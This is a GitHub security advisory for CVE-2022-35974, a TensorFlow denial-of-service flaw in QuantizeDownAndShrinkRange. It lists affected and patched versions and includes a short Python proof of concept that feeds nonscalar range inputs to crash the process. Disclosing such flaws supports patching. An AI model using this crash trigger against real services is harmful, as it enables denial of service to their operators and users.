GitHub Advisoryadvisory · PyPI
GHSA-vgvh-2pf4-jr2x TensorFlow vulnerable to segfault in `QuantizeDownAndShrinkRange`
MEDIUM
Official page ↗
- Aliases
- CVE-2022-35974
- Ecosystem
- PyPI
- Packages
- tensorflow, tensorflow-cpu, tensorflow-gpu
- Severity
- Moderate
- CVSS vector
- CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H
- Weaknesses
- CWE-20
- Reviewed
- 2022-09-16
Affected packages
• PyPI tensorflow: < 2.7.2 → fixed in 2.7.2
• PyPI tensorflow: >= 2.8.0, < 2.8.1 → fixed in 2.8.1
• PyPI tensorflow: >= 2.9.0, < 2.9.1 → fixed in 2.9.1
• PyPI tensorflow-cpu: < 2.7.2 → fixed in 2.7.2
• PyPI tensorflow-cpu: >= 2.8.0, < 2.8.1 → fixed in 2.8.1
• PyPI tensorflow-cpu: >= 2.9.0, < 2.9.1 → fixed in 2.9.1
• PyPI tensorflow-gpu: < 2.7.2 → fixed in 2.7.2
• PyPI tensorflow-gpu: >= 2.8.0, < 2.8.1 → fixed in 2.8.1
• PyPI tensorflow-gpu: >= 2.9.0, < 2.9.1 → fixed in 2.9.1
Description
Impact
If `QuantizeDownAndShrinkRange` is given nonscalar inputs for `input_min` or `input_max`, it results in a segfault that can be used to trigger a denial of service attack.
```python
import tensorflow as tf
out_type = tf.quint8
input = tf.constant([1], shape=[3], dtype=tf.qint32)
input_min = tf.constant([], shape=[0], dtype=tf.float32)
input_max = tf.constant(-256, shape=[1], dtype=tf.float32)
tf.raw_ops.QuantizeDownAndShrinkRange(input=input, input_min=input_min, input_max=input_max, out_type=out_type)
```
Patches
We have patched the issue in GitHub commit 73ad1815ebcfeb7c051f9c2f7ab5024380ca8613.
The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range.
For more information
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
Attribution
This vulnerability has been reported by Neophytos Christou, Secure Systems Labs, Brown University.
Related
Alias · CVE (1)
- CVE-2022-35974 TensorFlow is an open source platform for machine learning. vulnerability
Weakness · CWE (1)
- CWE-20 Improper Input Validation weakness
References
- https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vgvh-2pf4-jr2x web
- https://nvd.nist.gov/vuln/detail/CVE-2022-35974 advisory
- https://github.com/tensorflow/tensorflow/commit/73ad1815ebcfeb7c051f9c2f7ab5024380ca8613 web
- https://github.com/tensorflow/tensorflow package
- https://github.com/tensorflow/tensorflow/releases/tag/v2.10.0 web